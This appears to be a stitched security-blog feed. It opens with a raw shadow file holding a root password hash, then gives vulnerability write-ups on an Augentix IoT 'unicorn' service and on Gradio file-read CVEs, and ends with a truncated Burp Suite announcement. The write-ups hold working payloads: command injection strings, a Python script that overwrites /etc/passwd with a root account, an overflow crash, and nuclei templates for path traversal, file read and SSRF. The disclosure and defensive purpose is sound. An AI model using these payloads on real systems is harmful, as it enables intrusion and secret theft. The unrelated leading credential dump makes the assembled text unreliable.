b'root:$1$3hkdVSSD$iPawbqSvi5uhb7JIjY.MK0:10933:0:99999:7:::\ndaemon:*:10933:0:99999:7:::\nbin:*:10933:0:99999:7:::\nsys:*:10933:0:99999:7:::\nsync:*:10933:0:99999:7:::\nmail:*:10933:0:99999:7:::\nwww-data:*:10933:0:99999:7:::\noperator:*:10933:0:99999:7:::\nnobody:*:10933:0:99999:7:::\ndbus:*:::::::\nsshd:*:::::::\nsystemd-bus-proxy:*:::::::\nsystemd-journal-gateway:*:::::::\nsystemd-journal-remote:*:::::::\nsystemd-journal-upload:*:::::::\nsystemd-timesync:*:::::::\n'

Case 5 appears to be for receiving files from a client and is also vulnerable to command injection, although in this instance spaces break execution, which limits what can be run.

  case 5:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    file_size = parse_file_size((byte *)client_command);
    string_length = strlen(client_command);
    filename = get_cmd_data((byte *)client_command,string_length);
    syslog(6,"fSize = %lu\n",file_size);
    syslog(6,"fPath = \'%s\'\n",filename);
    sprintf(system_command_buffer,"%lu",file_size);
    syslog(6,"ret_value: %s\n",system_command_buffer);
    string_length = strlen(system_command_buffer);
    send_data_to_client((int *)client_info,system_command_buffer,string_length);
    operation_result = recieve_file((int)*client_info,(char *)filename,file_size);
    send_response_to_client((int)*client_info,(SSL **)(client_info + 4),operation_result);
    break;

The format of this command is:

AgtxCrossPlatCommn5<FILE> <NUM-BYTES>@

<FILE> is the name of the file to write and <NUM-BYTES> is the number of bytes that will be sent in the subsequent client transmit. The parse_file_size() function looks for the space and attempts to read the following characters as the number of bytes that will be sent. A command with no spaces, such as the id command, can be injected into the <FILE> portion:

AgtxCrossPlatCommn5test.txt;id #@

# Output from device
/system/bin # ./unicorn 
dos2unix: can't open 'test.txt': No such file or directory
uid=0(root) gid=0(root) groups=0(root),10(wheel)
^C

/system/bin # ls -l test.*
----------    1 root     root             0 Apr 18  2024 test.txt;id

This case can also be used to overwrite files. The following POC changes the first line in /etc/passwd:

import socket

HOST = "192.168.55.128" 
PORT = 6666 

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.sendall(b"AgtxCrossPlatCommn5/etc/passwd 29@")
    print(s.recv(1024))
    s.sendall(b"haxd:x:0:0:root:/root:/bin/sh")
    print(s.recv(1024))
    s.close()

/system/bin # cat /etc/passwd
haxd:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
sshd:x:1001:1001:SSH drop priv user:/:/bin/false
systemd-bus-proxy:x:1002:1004:Proxy D-Bus messages to/from a bus:/:/bin/false
systemd-journal-gateway:x:1003:1005:Journal Gateway:/var/log/journal:/bin/false
systemd-journal-remote:x:1004:1006:Journal Remote:/var/log/journal/remote:/bin/false
systemd-journal-upload:x:1005:1007:Journal Upload:/:/bin/false
systemd-timesync:x:1006:1008:Network Time Synchronization:/:/bin/false

Case 8 contains a command injection vulnerability. It is used to run the fw_setenv command, but takes user input as an argument and builds the command string which gets passed directly to a system() call.

  case 8:
  /* command injection here
    AgtxCrossPlatCommn8 ; touch /tmp/fw-setenv-cmdinj.txt # @ */
    
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    if (*client_command == '\0') {
      command_params = "fw_setenv --script /system/partition";
    }
    else {
      operation_result = FUN_0000ccd8(client_command);
      if (operation_result != 1) {
        operation_result = FUN_0000da18((int *)client_info,client_command);
        if (operation_result != -1) {
          return 0;
        }
        operation_result = -1;
        goto LAB_0000b63c;
      }
      sprintf(system_command_buffer,"fw_setenv %s",client_command);
      command_params = system_command_buffer;
    }
    system_command_status = run_system_cmd(command_params);
    goto LAB_0000b458;

The payload AgtxCrossPlatCommn8;id @ will cause the id command to be executed.
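The injection in case 8 works because client input is formatted into a single string that a shell then parses. As a rough illustration of the usual mitigation (this is not the vendor's code, and the allow-list pattern and the helper name build_fw_setenv_argv are assumptions made for this sketch), input can be validated per argument and passed as an argument vector so that no shell ever interprets it:

```python
import re

# Assumption: a deliberately conservative allow-list chosen for illustration.
# Anything containing shell metacharacters such as ';', '#', '|' or '$' fails.
_SAFE_ARG = re.compile(r"[A-Za-z0-9_.=/-]+")


def build_fw_setenv_argv(client_command: str) -> list:
    """Turn client input into an argv list instead of a shell string.

    Hypothetical helper: each whitespace-separated token must match the
    allow-list, otherwise the whole request is rejected.
    """
    args = client_command.split()
    for arg in args:
        if not _SAFE_ARG.fullmatch(arg):
            raise ValueError(f"rejected argument: {arg!r}")
    # The list would be handed to subprocess.run(argv, shell=False), so each
    # element reaches the program as one literal argument.
    return ["fw_setenv", *args]


if __name__ == "__main__":
    print(build_fw_setenv_argv("bootdelay 3"))
    try:
        build_fw_setenv_argv(";id ")
    except ValueError as exc:
        print("blocked:", exc)
```

The same idea applies to the other cases that reach system(): the payloads shown in this post depend on `;` and `#` being interpreted by a shell.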

Case 13 contains a buffer overflow vulnerability. This case runs cat on a user-provided file. If the filename or path is too long, it causes a buffer overflow.

  case 0xd:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    syslog(6,"ACT_cat: |%s| \n",client_command);
    operation_result = execute_cat_cmd((int *)client_info,client_command);
    if (operation_result != -1) {
      return 0;
    }
LAB_0000b63c:
    sprintf(system_command_buffer,"%d",operation_result);
    string_length = strlen(system_command_buffer);
    send_data_to_client((int *)client_info,system_command_buffer,string_length);
    break;

int execute_cat_cmd(int *socket_info,char *file_path)

{
  size_t result_length;
  char cat_command [128];
  char cat_result [256];
  
  memset(cat_result,0,0x100);
  memset(cat_command,0,0x80);
                    /* Buffer overflow here: "cat " plus file_path can exceed
                       the 128-byte cat_command buffer */
  sprintf(cat_command,"cat %s",file_path);
  FUN_0000cdc4(cat_command,cat_result);
  result_length = strlen(cat_result);
  send_data_to_client(socket_info,cat_result,result_length);
  return 0;
}
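The arithmetic behind the overflow can be sketched as follows. The buffer size and the "cat %s" format come from the decompiled function above; the helper names are made up for this sketch, and what lies beyond the buffer on the stack depends on the compiler and is not modelled here.

```python
CAT_COMMAND_SIZE = 128  # char cat_command[128] in the decompiled function
PREFIX = b"cat "        # literal part of the "cat %s" format string


def max_safe_path_len(buf_size: int = CAT_COMMAND_SIZE) -> int:
    """Longest file_path that still fits, leaving one byte for the NUL
    terminator that sprintf writes after the formatted string."""
    return buf_size - len(PREFIX) - 1


def overflows(file_path: bytes, buf_size: int = CAT_COMMAND_SIZE) -> bool:
    """True if sprintf(cat_command, "cat %s", file_path) would write past
    the end of cat_command."""
    return len(file_path) > max_safe_path_len(buf_size)


if __name__ == "__main__":
    print(max_safe_path_len())
    print(overflows(b"A" * 123), overflows(b"A" * 124))
```

In C, a bounded call such as snprintf with the destination size is the usual way to avoid this class of bug.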

Sending a large number of A’s causes a segfault; the register dump shows that several registers, including the program counter, and the stack have been overwritten with A’s. The payload AgtxCrossPlatCommn13 AAAAAAAAAAAAAA…snipped… @ will cause a crash.

Program received signal SIGSEGV, Segmentation fault.
0x41414140 in ?? ()
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$r0  : 0x0       
$r1  : 0x7efe7188  →  0x4100312d ("-1"?)
$r2  : 0x2       
$r3  : 0x0       
$r4  : 0x41414141 ("AAAA"?)
$r5  : 0x41414141 ("AAAA"?)
$r6  : 0x13a0    
$r7  : 0x7efef628  →  0x00000005
$r8  : 0x7efefaea  →  "   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r9  : 0x0008d40c  →  0x00000000
$r10 : 0x13a0    
$r11 : 0x41414141 ("AAAA"?)
$r12 : 0x0       
$sp  : 0x7efe7298  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$lr  : 0x00012de4  →  0xe1a04000
$pc  : 0x41414140 ("@AAA"?)
$cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x7efe7298│+0x0000: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"    ← $sp
0x7efe729c│+0x0004: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a0│+0x0008: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a4│+0x000c: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a8│+0x0010: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72ac│+0x0014: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72b0│+0x0018: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72b4│+0x001c: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:THUMB ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414140
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "unicorn", stopped 0x41414140 in ?? (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────

The research shows that a misconfiguration in firmware can lead to multiple code execution paths, and that reducing the remote attack surface, especially from developer tools, can greatly reduce the risk to an IoT device. We recommend that manufacturers of devices verify that the unicorn binary is not running or enabled as a service. This would mitigate all of the code execution paths described above. If you have any devices utilizing Augentix SoCs that have this binary, we’d love to hear about it.

Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces

14 June 2024 at 13:05

On Friday, May 31, the AI company Hugging Face disclosed a potential breach where attackers may have gained unauthorized access to secrets stored in their Spaces platform.

This reminded us of a couple of high severity vulnerabilities we disclosed to Hugging Face affecting their Gradio framework last December. When we reported these vulnerabilities, we demonstrated that they could lead to the exfiltration of secrets stored in Spaces.

Hugging Face responded in a timely way to our reports and patched Gradio. However, to our surprise, even though these vulnerabilities had long been patched, they were, up until recently, still exploitable on the Spaces platform for apps running an outdated Gradio version.

This post walks through the vulnerabilities we disclosed and their impact, and our recent effort to work with Hugging Face to harden the Spaces platform after the reported potential breach. We recommend all users of Gradio upgrade to the latest version, whether they are using Gradio in a Hugging Face Space or self-hosting.

Background

Gradio is a popular open-source Python-based web application framework for developing and sharing AI/ML demos. The framework consists of a backend server that hosts a standard set of REST APIs and a library of front-end components that users can plug in to develop their apps. A number of popular AI apps use Gradio such as the Stable Diffusion Web UI and Text Generation Web UI.

Users have several options for sharing Gradio apps: hosting it in a Hugging Face Space; self-hosting; or using the Gradio share feature, which exposes their machine to the Internet using a Gradio-provided proxy URL similar to ngrok.

A Hugging Face Space provides the foundation for hosting an app using Hugging Face’s infrastructure, which runs on Kubernetes. Users use Git to manage their source code and a Space to build, deploy, and host their app. Gradio is not the only way to develop apps – the Spaces platform also supports apps developed using Streamlit, Docker, or static HTML.

Within a Space, users can define secrets, such as Hugging Face tokens or API keys, that can be used by their app. These secrets are accessible to the application as environment variables. This method for secret storage is a step up from storing secrets in source code.

File Read Vulnerabilities in Gradio

Last December we disclosed to Hugging Face a couple of high severity vulnerabilities, CVE-2023-51449 and CVE-2024-1561, that allow attackers to read arbitrary files from a server hosting Gradio, regardless of whether it was self-hosted, shared using the share feature, or hosted in a Hugging Face space. In a Hugging Face space, it was possible for attackers to exploit these vulnerabilities to access secrets stored in environment variables by reading the /proc/self/environ pseudo-file.

CVE-2023-51449

CVE-2023-51449, which affects Gradio versions 4.0 – 4.10, is a path traversal vulnerability in the file endpoint. This endpoint is supposed to serve only files stored within a Gradio temporary directory. However, we found that the check for making sure a requested file was contained within the temporary directory was flawed.

The check on line 935 to prevent path traversal doesn’t account for subdirectories inside the temp folder. We found that we could use the upload endpoint to first create a subdirectory within the temp directory, and then traverse out from that subdirectory to read arbitrary files using the ../ or %2e%2e%2f sequence.
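For contrast, a containment check that is not fooled by subdirectories can be sketched as below. This is a generic illustration under our own assumptions, not Gradio's actual fix; the function name is_within_directory is hypothetical. The key point is that the requested path is resolved (collapsing `..` and symlinks) before it is compared against the base directory.

```python
import os


def is_within_directory(base_dir: str, requested: str) -> bool:
    """Return True only if `requested`, resolved relative to `base_dir`,
    still lives inside `base_dir`.

    Hypothetical helper for illustration. realpath() normalizes '..'
    segments and symlinks first, so 'sub/../../etc/passwd' is judged by
    where it really points rather than by its textual prefix.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    try:
        return os.path.commonpath([base, target]) == base
    except ValueError:
        # commonpath raises on Windows when the paths are on different drives.
        return False


if __name__ == "__main__":
    import tempfile

    tmp = tempfile.mkdtemp()
    os.makedirs(os.path.join(tmp, "sub"))
    print(is_within_directory(tmp, "sub/file.txt"))
    print(is_within_directory(tmp, "sub/../../etc/passwd"))
```

A server would also need to URL-decode the request path before running such a check, since sequences like %2e%2e%2f decode to ../.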

To read environment variables, one can request the /proc/self/environ pseudo-file using an HTTP Range header:

Interestingly, CVE-2023-51449 was introduced in version 4.0 as part of a refactor and appears to be a regression of a prior vulnerability CVE-2023-34239. This same exploit was tested to work against Gradio versions prior to 3.33.

Detection

Below is a nuclei template for testing this vulnerability:


id: CVE-2023-51449
info:
  name: CVE-2023-51449
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
  reference:
    - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2023-51449
  tags: cve2023, cve, gradio, lfi

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311

        -----------------------------250033711231076532771336998311
        Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
        Content-Type: application/octet-stream

        a
        -----------------------------250033711231076532771336998311--

      - |
        GET /file={{download_path}}{{path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\\[\"(.+)okmijnuhbygv\"\\]"

    payloads:
      path:
        - ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
        - ../../../../../../../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

Timeline

  • Dec. 17, 2023: Horizon3 reports vulnerability over email to Hugging Face.
  • Dec. 18, 2023: Hugging Face acknowledges report
  • Dec. 20, 2023: GitHub advisory published. Issue fixed in Gradio 4.11. (Note Gradio used this advisory to cover two separate findings, one for the LFI we reported and another for an SSRF reported by another researcher)
  • Dec. 22, 2023: CVE published
  • Dec. 24, 2023: Hugging Face confirms fix over email with commit https://github.com/gradio-app/gradio/issues/6816

CVE-2024-1561

CVE-2024-1561 arises from an input validation flaw in the component_server API endpoint that allows attackers to invoke internal Python backend functions. Depending on the Gradio version, this can lead to reading arbitrary files and accessing arbitrary internal endpoints (full-read SSRF). This affects Gradio versions 3.47 to 4.12. This is notable because the last version of Gradio 3 is 3.50.2, and a number of users haven’t made the transition yet to Gradio 4 because of the major refactor between versions 3 and 4. The vulnerable code:

On line 702, an arbitrary user-specified function is invoked against the specified component object.

For Gradio versions 4.3 – 4.12, the move_resource_to_block_cache function is defined in the base class of all Component classes. This function copies arbitrary files into the Gradio temp folder, making them available for attackers to download using the file endpoint. Just like CVE-2023-51449, this vulnerability can also be used to grab the /proc/self/environ pseudo-file containing environment variables.

In Gradio versions 3.47 – 3.50.2, a similar function called make_temp_copy_if_needed can be invoked on most Component objects.

In addition, in Gradio versions 3.47 to 3.50.2 another function called download_temp_copy_if_needed can be invoked to read the contents of arbitrary HTTP endpoints and store the results into the temp folder for retrieval, resulting in a full-read SSRF.

There are other component-specific functions that can be invoked across different Gradio versions, and their effects vary per component.
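The underlying pattern, looking up a method by a client-supplied name and calling it, can be made safer by invoking only methods that were explicitly opted in. The sketch below is a generic illustration; the `server` decorator, the `_is_server_fn` marker, and the DemoComponent class are names invented here and are not claimed to match Gradio's implementation.

```python
def server(fn):
    """Mark a method as safe to call from a remote client (hypothetical marker)."""
    fn._is_server_fn = True
    return fn


class DemoComponent:
    """Stand-in for a UI component; not a real Gradio class."""

    def move_resource_to_block_cache(self, path):
        # Internal helper that must never be reachable from the network.
        return f"copied {path}"

    @server
    def get_preview(self, data):
        return f"preview:{data}"


def call_component_fn(component, fn_name: str, data):
    """Dispatch a client-requested function only if it was opted in."""
    fn = getattr(component, fn_name, None)
    # Bound methods forward attribute reads to the underlying function,
    # so the marker set by @server is visible here.
    if not callable(fn) or not getattr(fn, "_is_server_fn", False):
        raise PermissionError(f"function {fn_name!r} is not exposed")
    return fn(data)


if __name__ == "__main__":
    comp = DemoComponent()
    print(call_component_fn(comp, "get_preview", "x"))
    try:
        call_component_fn(comp, "move_resource_to_block_cache", "/etc/passwd")
    except PermissionError as exc:
        print("blocked:", exc)
```

With a deny-by-default dispatch like this, adding a new helper to a base class does not silently widen the remote attack surface.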

Detection

The following nuclei templates can be used to test for CVE-2024-1561.

File read against Gradio 4.3-4.12:


id: CVE-2024-1561-4x
info:
  name: CVE-2024-1561-4x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this template works for Gradio versions 4.3-4.12
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"

    payloads:
      path:
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

File read against Gradio 3.47 – 3.50.2:


id: CVE-2024-1561-3x
info:
  name: CVE-2024-1561-3x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this version should work for versions 3.47 - 3.50.2
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"
    
    attack: clusterbomb
    payloads:
      fuzz_component_id:
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20
      path:
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

Exploiting the SSRF against Gradio 3.47-3.50.2:


id: CVE-2024-1561-3x-ssrf
info:
  name: CVE-2024-1561-3x-ssrf
  author: nvn1729
  severity: high
  description: Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"
    
    payloads:
      fuzz_component_id:
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: body
        regex:
          - <html><head></head><body>[a-z0-9]+</body></html>

Timeline

If you look up CVE-2024-1561 in NVD or MITRE, you’ll see that it was filed by the Huntr CNA and credited to another security researcher on the Huntr platform. In fact, that Huntr report was filed after our original report to Hugging Face, and after the vulnerability was already patched in the mainline. Due to various delays in getting a CVE assigned, Huntr assigned a CVE for this issue prior to us getting a CVE. Here is the actual timeline:

  • Dec. 20, 2023: Horizon3 reports vulnerability over email to Hugging Face.
  • Dec. 24, 2023: Hugging Face acknowledges report
  • Dec. 27, 2023: Fix merged to mainline with commit https://github.com/gradio-app/gradio/pull/6884
  • Dec. 28, 2023: Huntr researcher reports same issue on the Huntr platform here https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
  • Jan. 3, 2024: Hugging Face confirms to Horizon3 over email that the vulnerability is fixed with commit https://github.com/gradio-app/gradio/pull/6884 in version 4.13
  • Feb. 2024: Huntr gets confirmation from Gradio this issue is already fixed. Huntr may not have realized it was fixed prior to the report to them.
  • Mar. 17, 2024: Horizon3 checks with Gradio on filing a CVE
  • Mar. 23, 2024: Horizon3 files CVE request with MITRE
  • Apr. 15, 2024: Huntr published CVE-2024-1561
  • May 5, 2024: After multiple follow ups, MITRE assigns CVE-2024-34511 to this vulnerability
  • May 10, 2024: We ask MITRE to reject CVE-2024-34511 as a duplicate after realizing Huntr already had a CVE assigned.

Leaking Secrets in Hugging Face Spaces

As demonstrated above, both vulnerabilities CVE-2023-51449 and CVE-2024-1561 can be used to read arbitrary files from a server hosting Gradio. This includes the /proc/self/environ file on Linux systems containing environment variables. At the time of disclosing these vulnerabilities to Hugging Face, we set up a Hugging Face Space at https://huggingface.co/spaces/nvn1729/hello-world and showed that these vulnerabilities could be exploited to leak secrets configured for the Space. Below is an example of what the environment variable output looks like (with some data redacted). The user-configured secret and variable are the mysecret and myvariable entries.


PATH=REDACTED^@HOSTNAME=REDACTED^@GRADIO_THEME=huggingface^@TQDM_POSITION=-1^@TQDM_MININTERVAL=1^@SYSTEM=spaces^@SPACE_AUTHOR_NAME=nvn1729^@SPACE_ID=nvn1729/hello-world^@SPACE_SUBDOMAIN=nvn1729-hello-world^@CPU_CORES=2^@mysecret=mysecretvalue^@MEMORY=16Gi^@SPACE_HOST=nvn1729-hello-world.hf.space^@SPACE_REPO_NAME=hello-world^@SPACE_TITLE=Hello World^@myvariable=variablevalue^@REDACTED
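The ^@ sequences in this output are the caret notation for NUL bytes: on Linux, /proc/self/environ stores KEY=VALUE entries separated by NUL rather than newlines. A minimal sketch of turning such a dump into a dictionary (the function name parse_environ is ours) looks like this:

```python
def parse_environ(raw: bytes) -> dict:
    """Split a /proc/<pid>/environ style dump into a {name: value} dict."""
    env = {}
    for entry in raw.split(b"\x00"):
        if not entry:
            continue  # skip the empty piece after a trailing NUL
        key, sep, value = entry.partition(b"=")
        if sep:  # ignore malformed entries that have no '='
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


if __name__ == "__main__":
    sample = b"SYSTEM=spaces\x00mysecret=mysecretvalue\x00SPACE_TITLE=Hello World\x00"
    for name, value in parse_environ(sample).items():
        print(f"{name} = {value}")
```

Splitting on NUL rather than whitespace matters because values such as SPACE_TITLE can contain spaces.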

When we heard of the potential breach from Hugging Face on Friday, May 31, we were curious if it was possible that these old vulnerabilities were still exploitable on the Spaces platform. We started up the Space and were surprised to find that it was still running the same vulnerable Gradio version, 4.10, from December.

And the vulnerabilities we had reported were still exploitable. We then checked the Gradio versions for other Spaces and found that a substantial portion were out of date, and therefore potentially vulnerable to exfiltration of secrets.

It turns out that the Gradio version used by an app is generally fixed at the time a user develops and publishes an app to a Space. A file called README.md controls the Gradio version in use (3.50.2 in this example). It’s up to users to manually update their Gradio version.
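As a rough way to check a Space for this, the sketch below reads the sdk_version field from the YAML front matter at the top of a Space's README.md and compares it with 4.13, the release that the timeline above gives as fixing CVE-2024-1561. The helper names are ours, the parsing is deliberately simplistic (a regular expression rather than a YAML parser), and the threshold covers only the two CVEs discussed in this post, so upgrading to the latest release remains the safer choice.

```python
import re

# Per the timeline above, CVE-2024-1561 is fixed in 4.13
# (CVE-2023-51449 was fixed earlier, in 4.11).
FIXED_VERSION = (4, 13)


def read_sdk_version(readme_text: str):
    """Return sdk_version from the README front matter as a tuple of ints,
    or None if it cannot be found."""
    front_matter = re.match(r"---\s*\n(.*?)\n---", readme_text, re.DOTALL)
    if not front_matter:
        return None
    found = re.search(
        r"^sdk_version:\s*[\"']?([0-9]+(?:\.[0-9]+)*)",
        front_matter.group(1),
        re.MULTILINE,
    )
    if not found:
        return None
    return tuple(int(part) for part in found.group(1).split("."))


def is_outdated(readme_text: str) -> bool:
    """True if the pinned Gradio version predates FIXED_VERSION."""
    version = read_sdk_version(readme_text)
    return version is not None and version < FIXED_VERSION


if __name__ == "__main__":
    readme = "---\ntitle: Hello World\nsdk: gradio\nsdk_version: 3.50.2\n---\n"
    print(read_sdk_version(readme), is_outdated(readme))
```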

We reported the issue to Hugging Face and highlighted that old Gradio Spaces could be exploited by bad actors to steal secrets. Hugging Face responded promptly and implemented measures over the course of a week to harden the Spaces environment:

Hugging Face configured new rules in their “web application firewall” to neutralize exploitation of CVE-2023-51449, CVE-2024-1561, and other file read vulnerabilities reported by other researchers (CVE-2023-34239, CVE-2024-4941, CVE-2024-1728, CVE-2024-0964) that could be used to leak secrets. We iteratively tested different methods for exploiting all of these vulnerabilities and provided feedback to Hugging Face that was incorporated to harden the WAF.

Hugging Face sent out email notifications to users of Gradio Spaces recommending that users upgrade to the latest version.

Along with e-mail notifications, Hugging Face updated their Spaces user interface to highlight if a Space is running an old Gradio version.

Timeline

  • Dec. 18, 2023: We set up a test Space running Gradio 4.10 and demonstrate leakage of Space secrets as part of reporting CVE-2023-51449 and CVE-2024-1561
  • May 31, 2024: Hugging Face discloses potential breach
  • June 2, 2024: We revive the test Space and confirm it’s still running Gradio 4.10 and can be exploited to leak Space secrets. We verify there exist other Spaces running old versions.  We report this to Hugging Face.
  • June 3 – 9, 2024: Hugging Face updates their WAF based on our feedback to prevent exploitation of Gradio vulnerabilities that can lead to leakage of secrets.
  • June 7, 2024: Hugging Face sends out emails to users running outdated versions of Gradio, and rolls out an update to their user interface recommending that users upgrade.

We appreciate Hugging Face’s prompt response in improving their security posture.

Recommendations

In Hugging Face’s breach advisory, they noted that they proactively revoked some Hugging Face tokens that were stored as secrets in Spaces, and that users should refresh any keys or tokens as well. In this post, we’ve shown that old vulnerabilities in Gradio can still be exploited to leak Spaces secrets, and even if they are rotated, an attacker can still get access to them. Therefore, in addition to rotating secrets, we recommend users double check if they are running an outdated Gradio version and upgrade to the latest version if required.

To be clear: We have no idea whether this method of exploiting Gradio led to secrets being leaked in the first place, but the path we’ve shown in this post was available to attackers up until recently.

To upgrade a Gradio Space, a user can visit the README.md file in their Space and click “Upgrade”, as shown below:

Alternatively, users could stop storing secrets in their Gradio Space or enable authentication for their Gradio Space.

While Hugging Face did harden their WAF to neutralize exploitation, we caution users against thinking that this will truly protect them. At best, it’ll prevent exploitation by script kiddies using off-the-shelf POCs. It’s only a matter of time before bypasses are discovered.

Finally, for users of Gradio who are exposing it to the Internet using a Gradio share URL or self-hosting, we recommend enabling authentication and ensuring it’s updated to the latest version.

The post Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces appeared first on Horizon3.ai.

Announcing the Burp Suite Professional chapter in the Testing Handbook

14 June 2024 at 13:00

By Maciej Domanski

Based on our security auditing experience, we’ve found that Burp Suite Professional’s dynamic analysis can uncover vulnerabilities hidden amidst the maze of various target components. Unpredictable security issues like race conditions are often elusive when examining source code alone.

While Burp is a comprehensive tool for web application security testing, its extensive features may present a complex barrier. That’s where we, Trail of Bits, stand ready with our new Burp Suite guide in the Testing Handbook. This chapter aims to cut through this complexity, providing a clear and concise roadmap for running Burp Suite and achieving quick and tangible results.

The new chapter starts with an essential discussion on where Burp can support you. This section provides in-depth insights into how Burp can enhance your ability to conduct security testing, especially in the face of challenges like obfuscated front-end code, intricate infrastructural components, variations in deployment environments, or client-side data handling issues.

